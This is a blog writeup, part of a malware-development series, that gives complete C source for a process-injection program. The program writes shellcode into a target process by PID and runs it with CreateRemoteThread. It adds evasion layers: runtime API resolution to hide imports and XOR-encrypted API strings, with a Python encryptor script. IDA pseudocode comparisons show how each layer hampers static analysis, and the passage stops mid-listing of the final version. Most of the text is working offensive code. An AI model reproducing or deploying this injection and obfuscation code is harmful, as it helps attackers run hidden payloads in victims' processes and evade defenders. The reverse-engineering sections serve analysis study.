This writeup is part of a series where I plan to share what I’ve learned about malware development and red team tooling development. Each writeup will offer a guide and in-depth technical insights into the malware or program I’m working on. Along with that, I’ll include a simple reverse engineering analysis to show how it looks like in a disassembler. The goal is to sharpen my skills in both malware development and malware analysis/reverse engineering through this process.
This post will first show the steps in writing a simple malware program to inject shellcode into a remote target process by suppling the PID. In addition, it will then go over how we can hide suspicious Windows API calls from the Import Address Table (IAT) to avoid basic analysis, and last the writeup will go over how to XOR encrypt certain strings and how it obfuscates what the program does in basic static analysis.
All project files (code and scripts) can be found here: https://github.com/0xEct0/Maldev-Re-1
NOTE: The following snippets of code throughout this writeup have a lot of Windows APIs. I will not go in depth on what each argument/return value is, so please refer to the API’s respective Microsoft documentation page for more detailed technical information.
Writing a Simple Shellcode Injection Program - no-obfuscation.c
The overarching program no-obfuscation.c
execution flow at a high level:
- Accept via arguments PID of target process
- Validate there’s a running process that matches the PID supplied
- Open handle to target process
- Allocate memory in target process
- Write shellcode in the allocated memory within the target process
- Change permissions to have the region of memory executable
- Execute the shellcode in the region of allocated memory
The first step is pretty straight forward, we’ll get the second argument (first argument is the program name) and convert it to a integer:
int main( int argc, char *argv[] )
{
if( argc < 2 )
{
return;
}
DWORD process_id = atoi( argv[1] );
}
Now to validate that there’s a running process with that PID, we’ll use the following Windows APIs:
CreateToolhelp32Snapshot
- Gets a snapshot of all running processesProess32First
- Gets information of the first process in the snapshot fromCreateToolhelp32Snapshot
Process32Next
- Gets information of the next process in the snapshot fromCreateToolhelp32Snapshot
OpenProcess
- Once PID is verified, this API will get a handle to the process
Each process in the snapshot is of struct PROCESSENTRY32
, from Microsoft docs:
typedef struct tagPROCESSENTRY32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
ULONG_PTR th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
CHAR szExeFile[MAX_PATH];
} PROCESSENTRY32;
The field we’re interested in is the th32ProcessID
which holds the PID of the process.
To enumerate through the running processes, we first do CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 )
, TH32CS_SNAPPROCESS
means we will get all running processes on the system. And the next argument doesn’t really matter as per Microsoft docs on this API says, “The process identifier of the process to be included in the snapshot. This parameter can be zero to indicate the current process. This parameter is used when the TH32CS_SNAPHEAPLIST, TH32CS_SNAPMODULE, TH32CS_SNAPMODULE32, or TH32CS_SNAPALL value is specified. Otherwise, it is ignored and all processes are included in the snapshot.”
Once a snapshot has been successfully created, we’ll look into the first process using Process32First
and enter a do while loop to check the process ID. If it does not match what was supplied into the program it’ll go to the next process in the snapshot using Process32Next
. If the process ID matches, the program will obtain a handle to the target using the OpenProcess
API and break the do while loop. Below is the code for that
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
//
// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
process_snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( NULL == process_snapshot )
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
Process32First( process_snapshot, ¤t_process );
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
target_process = OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( Process32Next(process_snapshot, ¤t_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
// printf( "[!] Could not find target or OpenProcess() failed!\n" );
return 1;
}
Once the PID has been validated with a running process and a handle to the process has been obtained, the next step is to allocate memory in the target process using the VirtualAllocEx
API. We’ll be allocating enough memory by whatever the size of the payload is, and we’ll assign it with read and privileges, we’ll later modify this region of memory to allow it to execute in the later step. The API returns a pointer to where the memory was allocated in the process. Read the Microsoft docs for specific information about this function. Below is the code for allocating memory in the target process.
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
target_process_allocated_memory = VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
The next step is to inject our payload into the target memory process to where we allocated the memory in the previous step:
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
return_check = WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
Next is to update the allocated region in memory where we injected the payload to allow execution using the VirtualProtectEx
Windows API. We’ll be updating it with memory constraints of PAGE_EXECUTE_READWRITE
. Note that for this API you need to use the old_protect
field, from the API docs: “[out] lpflOldProtect - A pointer to a variable that receives the previous access protection of the first page in the specified region of pages. If this parameter is NULL or does not point to a valid variable, the function fails.” Below is the code for it.
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = NULL;
return_check = VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
Last, we’ll execute the shellcode that was injected by using the CreateRemoteThread
WinAPI:
//
// EXECUTED SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
handle_remote_thread = CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
// printf( "[+] Executed payload!\n" );
return 0;
Compilation was done using Microsoft Visual Studio cl.exe
compiler: cl.exe no-obfuscation.c /Fe:no-obfuscation.exe
Static Analysis of no-obfuscation.exe
For the reverse engineering analysis, I will be using IDA freeware. To start off, we can look at the Import Address Table (IAT). From this Microsoft dev blog (https://devblogs.microsoft.com/oldnewthing/20221006-07/?p=107257#:~:text=The import address table is the part of the Windows,functions imported from other DLLs), this is how the IAT is described as:
The import address table is the part of the Windows module (executable or dynamic link library) which records the addresses of functions imported from other DLLs. For example, if your program calls
GetSystemInfo()
, then the executable or DLL will have an entry in its import table that says, “I would like to be able to call the functionGetSystemInfo()
fromkernel32.dll
.” When the module is loaded, the system goes and finds that function, obtains its address, and stores it in a table known as the Import Address Table (IAT).
Essentially, we can look at the IAT to see which APIs is imported and used within the executable. This can give us an idea of what the executable will do. In IDA freeware, the IAT can be viewed under View
> Open subviews
> Imports
.
Right away, we can see some suspicious Windows APIs that are used which should be familiar to us. Grouping by functionality, the CreateToolhelp32Snapshot
, Process32First
, and Process32Next
APIs are used to enumerate through the running processes on the system while the OpenProcess
, VirtualAllocEx
, VirtualProtectEx
, WriteProcessMemory
, and CreateRemoteThread
are used for process injection/memory injection techniques.
In addition, we can have IDA generate pseudocode to make analysis easier by doing View
> Open subviews
> Generate pseudocode
. Here is the resulting pseudocode:
int __fastcall main(int argc, const char **argv, const char **envp)
{
HANDLE hProcess; // [rsp+48h] [rbp-180h]
void *lpBaseAddress; // [rsp+50h] [rbp-178h]
HANDLE hSnapshot; // [rsp+58h] [rbp-170h]
int v7; // [rsp+60h] [rbp-168h]
DWORD flOldProtect; // [rsp+64h] [rbp-164h] BYREF
SIZE_T dwSize; // [rsp+68h] [rbp-160h]
__int64 v10; // [rsp+70h] [rbp-158h]
PROCESSENTRY32 pe; // [rsp+80h] [rbp-148h] BYREF
if ( argc < 2 )
return 0;
hProcess = 0LL;
v7 = unknown_libname_19(argv[1], argv, envp);
hSnapshot = CreateToolhelp32Snapshot(2u, 0);
if ( !hSnapshot )
return 1;
pe.dwSize = 304;
Process32First(hSnapshot, &pe);
while ( v7 != pe.th32ProcessID )
{
if ( !Process32Next(hSnapshot, &pe) )
goto LABEL_8;
}
hProcess = OpenProcess(0x1FFFFFu, 1, pe.th32ProcessID);
LABEL_8:
CloseHandle(hSnapshot);
if ( !hProcess )
return 1;
dwSize = 3072LL;
lpBaseAddress = VirtualAllocEx(hProcess, 0LL, 0xC00uLL, 0x3000u, 4u);
if ( !lpBaseAddress )
return 1;
if ( !WriteProcessMemory(hProcess, lpBaseAddress, &unk_14001C000, dwSize, 0LL) )
return 1;
flOldProtect = 0;
if ( !VirtualProtectEx(hProcess, lpBaseAddress, dwSize, 0x40u, &flOldProtect) )
return 1;
v10 = 0LL;
return CreateRemoteThread(hProcess, 0LL, 0LL, (LPTHREAD_START_ROUTINE)lpBaseAddress, 0LL, 0, 0LL) == 0LL;
}
Here we can see IDA was pretty close to the source code, where we first check to ensure the user supplied an argument (a PID), then it enumerates through the processes using the aforementioned Windows APIs, gets a handle to the process using OpenProcess
, then uses several Windows APIs to inject the shellcode into the target process.
As shown, identifying which Windows APIs were used in this program was very straightforward, either looking at the IAT or the generated pseudocode from IDA allowed us to easily identify what APIs were used, and thus easily identify what the program is meant to do.
Obfuscating Windows APIs - obfuscated-apis.c
To provide a simple layer of obfuscation, we can utilize two APIs to dynamically load and call other Windows APIs: LoadLibraryA
and GetProcAddress
. The first obtains a handle to a DLL while the later gets the address of a function within a DLL. Using these two functions, we can declare a function pointer that matches the same signature of a specific WinAPI function that we want to utilize, and then assign the function pointer to the address of that WinAPI to later use. Consider the example below using MessageBoxA
:
char string1[] = "Hello, World!";
char string2[] = "Test MessageBox()";
MessageBoxA(NULL, string1, string2, MB_OK );
return 0;
Looking at the IAT, you can see the MessageBoxA
API be used. However, the code snippet below shows how we can dynamically load and call the same API:
char string1[] = "Hello, World!";
char string2[] = "Test MessageBox()";
HMODULE user32_handle = LoadLibraryA( "USER32.DLL" );
if( NULL == user32_handle )
{
DWORD dwError = GetLastError();
return 1;
}
int (WINAPI * _MessageBox)
(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
);
_MessageBox = ( int (WINAPI *)
(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
)) GetProcAddress( user32_handle, "MessageBoxA");
if( NULL == _MessageBox)
{
printf( "Could not initialize _MessageBox!\n" );
return 1;
}
_MessageBox(NULL, string1, string2, MB_OK );
return 0;
We first load the DLL using LoadLibraryA
, and in this instance we load user32.dll
since that’s where the API we’re looking to leverage resides. We then check to ensure it was loaded properly then define a function pointer with the same signatures as MessageBoxA
and name this function _MessageBox
. Then we set the pointer to the address of the MessageBoxA
function using GetProcAddress
. And last we check to ensure the function has been dynamically resolved correctly so that it is ready to be used. Looking at the IAT of the resulting exe in IDA, the IAT does not list MesageBoxA
. We can apply this same methodology in the original code for process injection.
For the process injection code, we’ll hide the main API functions that pretty much give away what the code does:
CreateToolhelp32Snapshot
Process32First
Process32Next
VirtualAllocEx
VirtualProtectEx
OpenProcess
WriteProcessMemory
CreateRemoteThread
All of these functions are from kernel32.dll
so we’ll just have to obtain the address of one module by doing the following:
HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
if( NULL == kernel32_dll_handle )
{
return 1;
}
Now with a handle to the kernel32 module, we can dynamically resolve our own WinAPI functions that match the signature of WinAPI functions to use using the API GetProcAddress
. The following example is resolving the CreateToolhelp32Snapshot
:
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );
Then to use _CreateToolhelp32snapshot
, we use it exactly like how we use the original API:
// check to ensure it's been resolved
if( NULL == _CreateToolhelp32Snapshot )
{
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
Another example with VirtualAllocEx
:
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
We can repeat this process of resolving API’s to hide them from the IAT. Here is the final code for this version:
#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"
int main( int argc, char* argv[] )
{
if( argc < 2 )
{
return 1;
}
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
DWORD process_id = atoi( argv[1] );
//
// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
HMODULE kernel32_dll_handle = LoadLibraryA( "KERNEL32.DLL" );
if( NULL == kernel32_dll_handle )
{
// printf( "Could not load kernel32.dll!\n" );
return 1;
}
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, "CreateToolhelp32Snapshot" );
if( NULL == _CreateToolhelp32Snapshot )
{
// printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( NULL == process_snapshot )
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
BOOL( WINAPI * _Process32First)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32First = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, "Process32First" );
if( NULL == _Process32First )
{
// printf( "Could not resolve Process32First!\n" );
return 1;
}
_Process32First( process_snapshot, ¤t_process );
BOOL( WINAPI * _Process32Next)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32Next = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, "Process32Next" );
if( NULL == _Process32Next )
{
// printf( "Could not resolve Process32Next!\n" );
return 1;
}
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
HANDLE( WINAPI * _OpenProcess )
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
_OpenProcess = ( HANDLE (WINAPI *)
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
)) GetProcAddress( kernel32_dll_handle, "OpenProcess" );
if( NULL == _OpenProcess )
{
// printf( "Could not resolve OpenProcess!\n" );
return 1;
}
target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( _Process32Next(process_snapshot, ¤t_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
return 1;
}
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualAllocEx" );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
// printf( "[+] Successfully allocated memory!\n" );
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
BOOL( WINAPI * _WriteProcessMemory )
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
_WriteProcessMemory = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
)) GetProcAddress( kernel32_dll_handle, "WriteProcessMemory" );
if( NULL == _WriteProcessMemory )
{
// printf( "Could not resolve WriteProcessMemory!\n" );
return 1;
}
return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = NULL;
BOOL( WINAPI * _VirtualProtectEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
_VirtualProtectEx = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
)) GetProcAddress( kernel32_dll_handle, "VirtualProtectEx" );
if( NULL == _VirtualProtectEx )
{
// printf( "Could not resolve VirtualProtectEx!\n" );
return 0;
}
return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
//
// EXECUTED SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
HANDLE( WINAPI * _CreateRemoteThread )
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
_CreateRemoteThread = ( HANDLE(WINAPI *)
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
)) GetProcAddress( kernel32_dll_handle, "CreateRemoteThread" );
if( NULL == _CreateRemoteThread )
{
// printf( "Could not resolve CreateRemoteThread!\n" );
return 1;
}
handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
return 0;
}
Static Analysis of obfuscated-apis.exe
Opening this version of the process injection executable and looking into the IAT, the APIs that we have dynamically resolved are removed.
Though with that, we can see the two new APIs that were used to hide them, GetProcAddress
and LoadLibraryA
. We could do further work and hide these two APIs by walking the PEB and calculating the absolute address for these functions but that is not in the scope of this article. This process is outlined in the shellcoding a reverse shell writeup in C post on my blog.
Furthermore, the pseudocode that’s generated by IDA looks similar where we can see the allocation/resolving of WinAPI functions and calling them:
int __fastcall main(int argc, const char **argv, const char **envp)
{
HMODULE hModule; // [rsp+48h] [rbp-1C0h]
__int64 v5; // [rsp+50h] [rbp-1B8h]
__int64 v6; // [rsp+58h] [rbp-1B0h]
HANDLE hObject; // [rsp+60h] [rbp-1A8h]
int v8; // [rsp+68h] [rbp-1A0h]
int v9; // [rsp+6Ch] [rbp-19Ch] BYREF
__int64 v10; // [rsp+70h] [rbp-198h]
HANDLE (__stdcall *CreateToolhelp32Snapshot)(DWORD, DWORD); // [rsp+78h] [rbp-190h]
BOOL (__stdcall *Process32First)(HANDLE, LPPROCESSENTRY32); // [rsp+80h] [rbp-188h]
HANDLE (__stdcall *OpenProcess)(DWORD, BOOL, DWORD); // [rsp+88h] [rbp-180h]
BOOL (__stdcall *Process32Next)(HANDLE, LPPROCESSENTRY32); // [rsp+90h] [rbp-178h]
LPVOID (__stdcall *VirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD); // [rsp+98h] [rbp-170h]
BOOL (__stdcall *WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *); // [rsp+A0h] [rbp-168h]
BOOL (__stdcall *VirtualProtectEx)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD); // [rsp+A8h] [rbp-160h]
HANDLE (__stdcall *CreateRemoteThread)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); // [rsp+B0h] [rbp-158h]
__int64 v19; // [rsp+B8h] [rbp-150h]
int v20; // [rsp+C0h] [rbp-148h] BYREF
unsigned int v21; // [rsp+C8h] [rbp-140h]
if ( argc < 2 )
return 1;
v5 = 0LL;
v8 = unknown_libname_19(argv[1], argv, envp);
hModule = LoadLibraryA(LibFileName);
if ( !hModule )
return 1;
CreateToolhelp32Snapshot = (HANDLE (__stdcall *)(DWORD, DWORD))GetProcAddress(hModule, ProcName);
if ( !CreateToolhelp32Snapshot )
return 1;
hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))CreateToolhelp32Snapshot)(2LL, 0LL);
if ( !hObject )
return 1;
v20 = 304;
Process32First = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32first);
if ( !Process32First )
return 1;
((void (__fastcall *)(HANDLE, int *))Process32First)(hObject, &v20);
Process32Next = (BOOL (__stdcall *)(HANDLE, LPPROCESSENTRY32))GetProcAddress(hModule, aProcess32next);
if ( !Process32Next )
return 1;
while ( v8 != v21 )
{
if ( !((unsigned int (__fastcall *)(HANDLE, int *))Process32Next)(hObject, &v20) )
goto LABEL_18;
}
OpenProcess = (HANDLE (__stdcall *)(DWORD, BOOL, DWORD))GetProcAddress(hModule, aOpenprocess);
if ( !OpenProcess )
return 1;
v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))OpenProcess)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
CloseHandle(hObject);
if ( !v5 )
return 1;
v10 = 3072LL;
VirtualAllocEx = (LPVOID (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD))GetProcAddress(hModule, aVirtualallocex);
if ( !VirtualAllocEx )
return 1;
v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))VirtualAllocEx)(v5, 0LL, v10, 12288LL, 4);
if ( !v6 )
return 1;
WriteProcessMemory = (BOOL (__stdcall *)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *))GetProcAddress(
hModule,
aWriteprocessme);
if ( !WriteProcessMemory )
return 1;
if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))WriteProcessMemory)(
v5,
v6,
&unk_14001C000,
v10,
0LL) )
return 1;
v9 = 0;
VirtualProtectEx = (BOOL (__stdcall *)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD))GetProcAddress(hModule, aVirtualprotect);
if ( !VirtualProtectEx )
return 0;
if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))VirtualProtectEx)(
v5,
v6,
v10,
64LL,
&v9) )
return 1;
v19 = 0LL;
CreateRemoteThread = (HANDLE (__stdcall *)(HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))GetProcAddress(hModule, aCreateremoteth);
if ( !CreateRemoteThread )
return 1;
v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))CreateRemoteThread)(
v5,
0LL,
0LL,
v6,
0LL,
0,
0LL);
return v19 == 0;
}
In general, by looking through the pseudocode you can still infer what the executable is doing, namely because IDA is able to identify what API functions are being used by resolving them.
Encrypting the WinAPI Strings - encrypted-apis.c
To further apply anti-analysis techniques to the process injection program, we’ll be XOR encrypting suspicious strings such as any modules we load as well as the APIs we are resolving using GetProcAddress
. To encrypt strings, I used the following python3 program which will take all strings in a file xor-list.txt
, generate a random one byte key, XOR encrypt all the strings in the text file, and output the resulting XOR encrypted string bytes in a C format:
import random
def generate_xor_key():
return random.getrandbits( 8 )
def xor_encrypt( data, key ):
data += b'\0'
return bytes( [b ^ key for b in data] )
def format_variable_name( name ):
if '.' in name:
name = name.replace( '.', '_' )
return name + '_encrypted'
def main():
key = generate_xor_key()
with open( 'xor-list.txt', 'r' ) as file:
api_names = file.readlines()
for api_name in api_names:
api_name = api_name.strip()
api_name_bytes = api_name.encode()
encrypted_api_name = xor_encrypt( api_name_bytes, key )
c_formatted_encrypted = ', '.join( f'0x{b:02x}' for b in encrypted_api_name )
c_formatted_key = f'0x{key:02x}'
variable_name = format_variable_name( api_name )
print( f"unsigned char {variable_name}[] = };\n" )
print( f"unsigned char key = {c_formatted_key};" )
if __name__ == '__main__':
main()
Example output:
unsigned char user32_dll_encrypted[] = {0xac, 0xaa, 0xbc, 0xab, 0xea, 0xeb, 0xf7, 0xbd, 0xb5, 0xb5, 0xd9};
unsigned char MessageBoxA_encrypted[] = {0x94, 0xbc, 0xaa, 0xaa, 0xb8, 0xbe, 0xbc, 0x9b, 0xb6, 0xa1, 0x98, 0xd9};
unsigned char key = 0xd9;
The following C XOR decryption function is used. It essentially XOR decrypts in memory given the encrypted byte string and the length:
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x70;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
Putting it together in a simple example, we can XOR encrypt the user32.dll
string and the MessageBoxA
string, and before we use those strings we decrypt it in memory:
#include <stdio.h>
#include <string.h>
#include <windows.h>
//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x70;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
int main()
{
unsigned char user32_dll_encrypted[] = {0x05, 0x03, 0x15, 0x02, 0x43, 0x42, 0x5e, 0x14, 0x1c, 0x1c, 0x70};
unsigned char MessageBoxA_encrypted[] = {0x3d, 0x15, 0x03, 0x03, 0x11, 0x17, 0x15, 0x32, 0x1f, 0x08, 0x31, 0x70};
xor_decrypt( user32_dll_encrypted, sizeof(user32_dll_encrypted) );
HMODULE user32_handle = LoadLibraryA( user32_dll_encrypted );
if( NULL == user32_handle )
{
DWORD dwError = GetLastError();
return 1;
}
int( WINAPI * _MessageBox )
(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
);
xor_decrypt( MessageBoxA_encrypted, sizeof(MessageBoxA_encrypted) );
_MessageBox = ( int (WINAPI *)
(
HWND hWnd,
LPCTSTR lpText,
LPCTSTR lpCaption,
UINT uType
)) GetProcAddress( user32_handle, MessageBoxA_encrypted );
if( NULL == _MessageBox )
{
// printf( "Could not initialize _MessageBox!\n" );
return 1;
}
_MessageBox( NULL, "wowowow!", "boo!", MB_OK );
return 0;
}
After compiling and opening it in IDA, we no longer see the user32.dll
and MessageBoxA
strings, and in addition, the pseudocode it generates is not able to tell what function is being called from resolving it. The above program’s message box call in IDA’s pseudocode looks like:
((void (__fastcall *)(_QWORD, char *, char *, _QWORD))ProcAddress)(0LL, aWowooww, aBoo, 0LL);
Compared to the previous section’s program where IDA was able to tell what program was being called from resolving it, this program is more obfuscated. We can apply this same logic and obfuscate the rest of the strings such as kernel32.dll
and the rest of the APIs. Below is the list xor-list.txt
of strings I want to encrypt.
kernel32.dll
user32.dll
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
VirtualAllocEx
WriteProcessMemory
VirtualProtectEx
CreateRemoteThread
An example of applying the XOR encrypted string in the program with the VirtualAllocEx
API is shown below where before we resolve the API, we define it’s string in a byte array format (VirtualAllocEx_encrypted
) and decrypt it in place. Then we use the string byte array in the GetProcAddress
call.
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
We can repeat the process to result in all the strings for the APIs/Module names listed above being encrypted and thus hidden from the IAT, strings list, and would be slightly harder overall to do static analysis (will be shown below in the next section). Here is the finalized code with all the Module/API strings XOR encrypted:
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"
//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x57;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
int main( int argc, char* argv[] )
{
if( argc < 2 )
{
return 1;
}
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
DWORD process_id = atoi( argv[1] );
//
